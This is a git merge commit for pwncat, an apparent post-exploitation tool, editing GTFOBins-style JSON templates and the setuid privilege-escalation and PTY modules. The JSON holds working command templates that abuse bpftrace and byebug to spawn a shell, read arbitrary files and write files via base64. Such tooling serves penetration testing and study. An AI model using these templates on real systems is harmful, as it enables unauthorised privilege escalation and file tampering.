Merge branch 'master' of github.com:calebstewart/pwncat

2024-11-24 01:25:37 +01:00 · 2020-05-09 22:08:08 -04:00 · 2020-05-09 22:08:08 -04:00 · 7eff74efd5
commit 7eff74efd5
parent 0145a48357 b6a926033d
4 changed files with 14 additions and 5 deletions
--- a/.gitignore
+++ b/.gitignore
@ -4,3 +4,4 @@ env/
 **/*.egg-info/
 build/
 dist/
+.byebug_history
--- a/data/gtfobins.json
+++ b/data/gtfobins.json
@ -85,7 +85,7 @@
 	{
 		"name": "bpftrace",
 		"shell": {
-			"script": "{command} -c {shell} -e 'END {{{{exit()}}}}'", 
+			"script": "{command} -c {shell} -e 'END {{exit()}}'", 
 			"suid": ["-p"]
 		}
 	},
@ -119,13 +119,16 @@
 	{
 		"name": "byebug",
 		"shell": {
-			"script": "TF=$(mktemp);echo 'system(\"{shell}\")' > $TF;{command} $TF",
-			"input": "continue\n"
+			"script": "TF=$(mktemp);echo 'system(\"{shell}\")' > $TF;{command}  --no-stop -q $TF",
+			"need": [
+				"--no-stop",
+				"-q"
+			]
 		},
-		"read_file": "TF=$(mktemp);echo 'system(\"cat {lfile}\")' > $TF;{command} $TF",
+		"read_file": "TF=$(mktemp);echo 'system(\"cat {lfile}\")' > $TF;{command}  --no-stop -q $TF",
 		"write_file": {
 			"type": "base64",
-			"payload": "TF=$(mktemp);echo 'system(\"echo {data} | base64 -d > {lfile}\")' > $TF;{command} $TF"
+			"payload": "TF=$(mktemp);echo 'system(\"echo {data} | base64 -d > {lfile}\")' > $TF;{path} --no-stop -q $TF"
 		}
 	},
 	{
--- a/pwncat/privesc/setuid.py
+++ b/pwncat/privesc/setuid.py
@ -67,6 +67,7 @@ class SetuidMethod(Method):
        # Update the cache for the current user
        self.find_suid()

+        known_techniques = []
        for user, paths in self.suid_paths.items():
            for path in paths:
                binary = gtfobins.Binary.find(path)
@ -95,6 +96,7 @@ class SetuidMethod(Method):

        # Run the start commands
        self.pty.run(enter + "\n", wait=False)
+        # self.pty.process(enter, delim=False)

        # Send required input
        self.pty.client.send(input.encode("utf-8"))
--- a/pwncat/pty.py
+++ b/pwncat/pty.py
@ -799,6 +799,8 @@ class PtyHandler:

            response = self.recvuntil(b"_PWNCAT_ENDDELIM_")
            response = response.split(b"_PWNCAT_ENDDELIM_")[0]
+            if b"_PWNCAT_STARTDELIM_" in response:
+                response = b"\n".join(response.split(b"\n")[1:])

            if self.has_cr:
                self.recvuntil(b"\r\n")
@ -985,6 +987,7 @@ class PtyHandler:
            if line == "":
                continue
            line = line.strip().split(":")
+
            user_data = {
                "name": line[0],
                "password": None,